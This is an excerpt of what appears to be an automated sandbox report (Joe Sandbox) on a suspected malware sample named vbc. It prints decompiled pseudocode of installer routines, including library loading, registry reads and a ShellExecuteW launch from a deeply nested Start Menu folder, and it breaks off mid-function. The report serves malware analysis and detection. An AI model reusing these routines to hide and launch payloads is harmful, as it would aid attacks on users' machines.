0x0040339f
0x004033a1
0x00000000
0x00000000
0x004033a3
0x004033a3
0x004033b6
0x00000000
0x00000000
0x004033c5
0x00000000
0x004033c5
0x0040337e
0x00403385
0x004033d2
0x004033d8
0x004033d8
0x00000000
0x004033d8
0x00403387
0x0040338d
0x00403393
0x00000000
0x00000000
0x00000000
0x004033d6
0x004033d6
0x00000000
0x004033d6
0x00000000

APIs

GetTickCount.KERNEL32(00000000,00000000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 00403297

Part of subcall function 00403402: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004032CA
SetFilePointer.KERNEL32(0000955A,00000000,00000000,00414ED0,00004000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000), ref: 004033C5

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
Instruction ID: 6f8adcdc05782984f9803186be869087625e4848c31a04748361169110b3332d
Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
Instruction Fuzzy Hash: 66314A72614205DBD7109F29FEC49663BA9F74039A714423FE900F22E0DBB9AD018B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00402032(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a2f8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2c8 =  *0x42a2c8 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402C53(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x38)) = E00402C53(1);
				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E0040665B( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x38)));
					if(_t38 == _t32) {
						E00405371(0xfffffff7,  *((intOrPtr*)(_t39 - 0x38)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cddc, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x20)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E004039FB( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00402032
0x00402032
0x00402037
0x0040203e
0x004020fd
0x0040224b
0x0040224b
0x00402adb
0x00402ade
0x00402aea
0x00402aea
0x0040204d
0x00402057
0x0040205a
0x0040206a
0x0040206e
0x00402076
0x00402079
0x004020f6
0x00000000
0x004020f6
0x0040207b
0x00402086
0x0040208a
0x004020ca
0x0040208c
0x0040208f
0x00402092
0x004020be
0x00402094
0x00402097
0x004020a0
0x004020a2
0x004020a2
0x004020a0
0x00402092
0x004020d2
0x004020eb
0x004020eb
0x00000000
0x004020d2
0x0040205d
0x00402065
0x00402068
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D

Part of subcall function 00405371: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
Part of subcall function 00405371: lstrcatW.KERNEL32 ref: 004053CC
Part of subcall function 00405371: SetWindowTextW.USER32 ref: 004053DE
Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040206E
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: c3fb0e46b14a59558bcb67cbe3242b1d9f84f2f7d5cdac2e4543657a8532a443
Instruction ID: e4abfbb00710fbb49cfbee30f6c47c6475fc16ace361a0eeed54ffc6686eb32c
Opcode Fuzzy Hash: c3fb0e46b14a59558bcb67cbe3242b1d9f84f2f7d5cdac2e4543657a8532a443
Instruction Fuzzy Hash: EB21AD71900215EBCF206FA5CE4999E7971BF04358F60453BF511B51E0CBBD8982DA6D

Uniqueness

Uniqueness Score: -1.00%

Function 00401B71 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B71(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x20));
				_t30 =  *0x40cddc; // 0x0
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x24)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E00406234(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x28)));
						_t12 =  *0x40cddc; // 0x0
						 *_t34 = _t12;
						 *0x40cddc = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t30 + 4; // 0x4
							E00406212(_t33, _t3);
							_push(_t30);
							 *0x40cddc =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t30 == _t28) {
							break;
						}
						_t30 =  *_t30;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t30 == _t28) {
								break;
							} else {
								_t32 = _t30 + 4;
								_t36 = L"Call";
								E00406212(_t36, _t30 + 4);
								_t22 =  *0x40cddc; // 0x0
								E00406212(_t32, _t22 + 4);
								_t25 =  *0x40cddc; // 0x0
								_push(_t36);
								_push(_t25 + 4);
								E00406212();
								L15:
								 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E00406234(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405957();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}

0x00401b71
0x00401b71
0x00401b74
0x00401b7c
0x00401bc5
0x00401bf3
0x00401bfc
0x00401bfe
0x00401c02
0x00401c07
0x00401c0c
0x00401c0e
0x00401bc7
0x00401bc9
0x004028a1
0x00401bcf
0x00401bcf
0x00401bd4
0x00401bdb
0x00401bdc
0x00401be1
0x00401be1
0x00401bc9
0x00000000
0x00401b7e
0x00401b7e
0x00401b7e
0x00401b81
0x00000000
0x00000000
0x00401b87
0x00401b8b
0x00000000
0x00401b8d
0x00401b8f
0x00000000
0x00401b95
0x00401b95
0x00401b98
0x00401b9f
0x00401ba4
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbc
0x004029f7
0x00402adb
0x00402ade
0x00402ae4
0x00402ae4
0x00401b8f
0x00000000
0x00401b8b
0x004022e4
0x004022f1
0x004022f2
0x004022f7
0x004022f7
0x00402ae6
0x00402aea

APIs

GlobalFree.KERNEL32(00000000), ref: 00401BE1
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3

Strings

Call, xrefs: 00401B98, 00401B9E, 00401BB8

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: a129a9bae1f3e3aa0587fed65d507cc7f280475a2da7505159faf37190c725ea
Instruction ID: bfeac54a7e569f0ef8803044b169413d496b9424a5b862e02772d0402316afe5
Opcode Fuzzy Hash: a129a9bae1f3e3aa0587fed65d507cc7f280475a2da7505159faf37190c725ea
Instruction Fuzzy Hash: 5521AE72A44140EBCB20EBD48E8495E77B9EF94318B21457BF502B72D0DBB89851DF2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402511 Relevance: 4.5, APIs: 3, Instructions: 46
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402511(int* __ebx, intOrPtr __edx, short* __esi) {
				int _t9;
				long _t12;
				int* _t15;
				intOrPtr _t20;
				void* _t21;
				short* _t23;
				void* _t25;
				void* _t28;

				_t23 = __esi;
				_t20 = __edx;
				_t15 = __ebx;
				_t21 = E00402D5D(_t28, 0x20019);
				_t9 = E00402C31(3);
				 *((intOrPtr*)(_t25 - 0x50)) = _t20;
				 *__esi = __ebx;
				if(_t21 == __ebx) {
					L7:
					 *((intOrPtr*)(_t25 - 4)) = 1;
				} else {
					 *(_t25 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t25 - 0x18)) == __ebx) {
						_t12 = RegEnumValueW(_t21, _t9, __esi, _t25 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t12;
						if(_t12 != 0) {
							goto L7;
						} else {
							goto L4;
						}
					} else {
						RegEnumKeyW(_t21, _t9, __esi, 0x3ff); // executed
						L4:
						_t23[0x3ff] = _t15;
						_push(_t21); // executed
						RegCloseKey(); // executed
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t25 - 4));
				return 0;
			}

0x00402511
0x00402511
0x00402511
0x0040251d
0x0040251f
0x00402527
0x0040252a
0x0040252d
0x004028a1
0x004028a1
0x00402533
0x0040253b
0x0040253e
0x00402557
0x0040255d
0x0040255f
0x00000000
0x00000000
0x00000000
0x00000000
0x00402540
0x00402544
0x00402565
0x00402565
0x0040256c
0x0040256d
0x0040256d
0x0040253e
0x00402ade
0x00402aea

APIs

Part of subcall function 00402D5D: RegOpenKeyExW.KERNEL32 ref: 00402D85

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402544
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402557
RegCloseKey.KERNEL32(?), ref: 0040256D

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 0c95f07365d0810d1379e4cf05c2d8f775e19b9fc74d36f1e15b5dbdcc2d3ea2
Instruction ID: bf3b2bcb6287721b49d379c1e5eb9bed13c1d22dc32754f1d9800637ac4e69b6
Opcode Fuzzy Hash: 0c95f07365d0810d1379e4cf05c2d8f775e19b9fc74d36f1e15b5dbdcc2d3ea2
Instruction Fuzzy Hash: 44018F71A04204ABE7109FA59E8CABF766CEF40388F10443EF506A61D0EAF84E419629

Uniqueness

Uniqueness Score: -1.00%

Function 00401E77 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00401E77() {
				short* _t6;
				void* _t16;
				void* _t19;
				void* _t26;

				_t24 = E00402C53(_t19);
				_t6 = E00402C53(0x31);
				_t22 = E00402C53(0x22);
				E00402C53(0x15);
				E00401423(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t16 = ShellExecuteW( *(_t26 - 8),  ~( *_t5) & _t24, _t6,  ~( *_t7) & _t22, L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93\\Vatersotiges\\Knoglemarvsundersgelsen\\Armoniac",  *(_t26 - 0x1c)); // executed
				if(_t16 < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x00401e7f
0x00401e81
0x00401e91
0x00401e93
0x00401e9a
0x00401ea8
0x00401eb8
0x00401ec1
0x00401eca
0x004028a1
0x004028a1
0x00402ade
0x00402aea

APIs

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac,?), ref: 00401EC1

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac, xrefs: 00401EAA

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac
API String ID: 587946157-910239263
Opcode ID: e7bff97d71f21c96df116bedaaf52e3af406fef7691ae85ae08fd2fc7f8bfbb5
Instruction ID: 3dcdd3b781ba8ea7f848cddc5e889496084bd88ab3ad0d62e4dc7728c2b1bbdb
Opcode Fuzzy Hash: e7bff97d71f21c96df116bedaaf52e3af406fef7691ae85ae08fd2fc7f8bfbb5
Instruction Fuzzy Hash: 35F0C835704511A7DB107BB5DE4AA9D3264DB40758F208576F901F71D1DAFCC9829628

Uniqueness

Uniqueness Score: -1.00%

Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 10002963
GetLastError.KERNEL32 ref: 10002A6A

Memory Dump Source

Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_vbc.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040317B Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040317B(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a298;
					 *0x418ed4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403283(4);
				if(_t22 >= 0) {
					_t24 = E00405E6A( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x418ed4 =  *0x418ed4 + 4;
						_t36 = E00403283(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x418ed4 =  *0x418ed4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E00405E6A( *0x40a01c, 0x414ed0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E00405E99(_a8, 0x414ed0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x418ed4 =  *0x418ed4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x0040317f
0x00403188
0x00403191
0x00403195
0x004031a0
0x004031a0
0x004031a8
0x004031af
0x004031c1
0x004031c8
0x0040326d
0x0040326d
0x00000000
0x004031ce
0x004031d1
0x004031dd
0x004031e1
0x0040327b
0x0040327b
0x004031e7
0x004031ea
0x00403249
0x0040324f
0x00403251
0x00403251
0x00403263
0x0040326b
0x00403272
0x00403275
0x00000000
0x00000000
0x00000000
0x00000000
0x004031ec
0x004031ef
0x00000000
0x004031f5
0x004031fa
0x00403201
0x00403204
0x00403206
0x00403206
0x00403213
0x00403216
0x0040321d
0x00000000
0x00000000
0x00403226
0x0040322d
0x00403245
0x0040326f
0x0040326f
0x0040322f
0x0040322f
0x00403232
0x00403235
0x0040323b
0x00403241
0x00000000
0x00403243
0x00000000
0x00403243
0x00403241
0x00000000
0x0040322d
0x00000000
0x004031fa
0x004031ef
0x004031ea
0x004031e1
0x004031c8
0x0040327d
0x00403280

APIs

SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004031A0

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
Instruction ID: 40ace49db037ace229a3e5c96781d28ed7fa856bf3440834985399bb1b02b3fc
Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
Instruction Fuzzy Hash: 65316B30601219EBDF10DFA5ED84ADA3E68FF04799F20417EF905E6190D7788E509BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040249D Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040249D(int* __ebx, char* __esi) {
				void* _t17;
				short* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402D5D(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402C53(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x50) = 0x800;
					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x50) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E00406159(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33); // executed
					RegCloseKey(); // executed
				}
				 *0x42a2c8 =  *0x42a2c8 +  *(_t37 - 4);
				return 0;
			}

0x0040249d
0x0040249d
0x004024a2
0x004024a9
0x004024ab
0x004024b2
0x004024b5
0x004028a1
0x004024bb
0x004024be
0x004024d9
0x00402509
0x00402509
0x0040250c
0x004024db
0x004024df
0x004024f8
0x004024ff
0x00402502
0x004024e1
0x004024e4
0x004024ef
0x00402565
0x00000000
0x00000000
0x00000000
0x004024e4
0x004024df
0x0040256c
0x0040256d
0x0040256d
0x00402ade
0x00402aea

APIs

Part of subcall function 00402D5D: RegOpenKeyExW.KERNEL32 ref: 00402D85

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024CE
RegCloseKey.KERNEL32(?), ref: 0040256D

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 30b04810283adb96102801c9ea5a0bfc3350ff4b9ed8da539be931810b49eef3
Instruction ID: 1238864f951968f7a69ddad796cf6f28c2cd02d7cb81d74efa810d70cc71421c
Opcode Fuzzy Hash: 30b04810283adb96102801c9ea5a0bfc3350ff4b9ed8da539be931810b49eef3
Instruction Fuzzy Hash: D7115471900205EADB14DFA0CA9C5AE77B4EF04345F21843FE142A72D0D6B88A45DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a270;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
